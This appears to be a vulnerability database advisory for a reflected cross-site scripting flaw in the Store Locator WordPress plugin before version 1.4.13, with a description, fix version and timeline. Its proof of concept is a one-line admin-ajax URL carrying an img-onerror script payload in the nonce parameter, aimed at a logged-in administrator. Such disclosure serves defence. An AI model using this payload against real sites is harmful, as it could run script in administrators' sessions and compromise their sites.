WordPress Plugin Vulnerabilities

Store Locator WordPress < 1.4.13 - Reflected XSS

Description

The plugin does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the URL below

https://example.com/wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`XSS`>

Affects Plugins

Fixed in 1.4.13

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
tnt24
Submitter
tnt24
Verified
Yes

Timeline

Publicly Published
2023-08-10 (about 9 months ago)
Added
2023-08-10 (about 9 months ago)
Last Updated
2023-08-10 (about 9 months ago)

Other